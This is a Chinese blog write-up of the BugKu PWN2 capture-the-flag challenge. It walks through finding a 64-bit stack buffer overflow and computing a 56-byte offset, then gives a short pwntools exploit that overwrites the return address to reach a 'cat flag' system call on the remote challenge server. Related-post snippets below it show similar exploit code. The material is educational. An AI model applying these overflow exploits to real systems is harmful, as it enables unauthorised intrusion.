[BUGKU] [PWN] PWN2

最新推荐文章于 2023-04-01 18:28:56 发布
最新推荐文章于 2023-04-01 18:28:56 发布
阅读量267 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cf260469080/article/details/106185960
版权

[BUGKU] [PWN] PWN2

先下载文件,拉入UBUNTU,checksec检查一下

checksec pwn2

发现啥都没开,最重要的是架构是amd64

在windows里把pwn2拉入64位ida

F5切换到伪C

注意这句话

read(0, &s, 0x100uLL);

常见的缓冲区漏洞

shift+f12查看字符串

发现有一个cat flag

x发现交叉引用

.text:0000000000400769 mov edi, offset command ; “cat flag”
.text:000000000040076E call _system

之后计算偏移offset

char s; // [sp+0h] [bp-30h]

s=30h=48

向上8字节rbp

+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)

所以offset=48+8=56

之后写exploit

from pwn import * 
a=remote('114.116.54.89',10003)
a.recvuntil("?") 
a.sendline(b"a" * 56 + p64(0x400769))
a.interactive()

然后运行

python 1.py

即可发现flag

三无提督w
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 1917
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
pwn栈溢出2
qq_53058639的博客
08-23 121
(英语:Return-Oriented Programming,缩写:ROP)是计算机安全中的一种,该技术允许攻击者在程序启用了安全保护技术(如堆栈不可执行)的情况下控制程序执行流,执行恶意代码。其核心思想是通过栈溢出等方式控制堆栈调用,以劫持程序控制流并执行针对性的机器语言指令序列(称为所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。F5反汇编checksec 查看信息计算padding查找gadgets。
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku pwn2
doudoudedi
06-04 1686
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
Bugku pwn2
、moddemod
05-26 427
pwn2 题目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
bugku-pwn2-wp
weixin_45427676的博客
04-05 338
下载完题后先在VM中checksec查看保护机制 基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数 可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。 在main函数下面有一个get_shell_()函数,打开看一下 有一个system(“cat fl...
bugku-pwn2
ro4lsc的博客
05-31 554
pwn2 首先我对pwn题完全没有了解,真萌新,所以就刷刷最基础的题目吧。 我是使用了pwndocker,第一次用没啥感觉。 docker exec -it mypwn /bin/bash wget https://ctf.bugku.com/files/ad67ac41b68c70c40d90bce4a39796e4/pwn2 checksec pwn2 这个东西我暂时看不懂,只知道这个pwn2是个64位程序 用IDA打开,找到main函数F5 int __cdecl main(int argc,
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku pwn1
PRCORANGE的博客
04-13 195
题目: nc 114.67.246.176 10846 nc:全称Netcat,用于连接远程服务器端口。连接后它会返回一个cmdshell用于执行命令(Linux自带该命令)。 在linux中连接服务器,再使用ls查看目录 cat flag
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2331
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1297
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
bugku-pwn-wp
令则
03-27 431
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
Bugku pwn4 WP
至臻求学,胸怀云月
02-18 694
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x4...
Bugku PWN Easy_int
JEWSWS的博客
04-01 321
【春风不解语,独做狮子吟。】
Bugku pwn4
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-24 260
准备: 可以看到程序没有开任何的保护 运行测试了一下,有一个输入数据的点 IDA 定位到主函数,很明显这里的 s 可以作为溢出的点 浏览了一下找到了system函数,kaix… 找找rop点,查看一下字符串 刚开始也很懵逼,找了一下/bin/bash 没找到,去看了wp,原来这里的$0也是可以利用的,system('/bin/bash')和system('$0')的效果是一样的。 这样我们就可以借用'$0'来溢出拿到shell OK现在我们有...
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值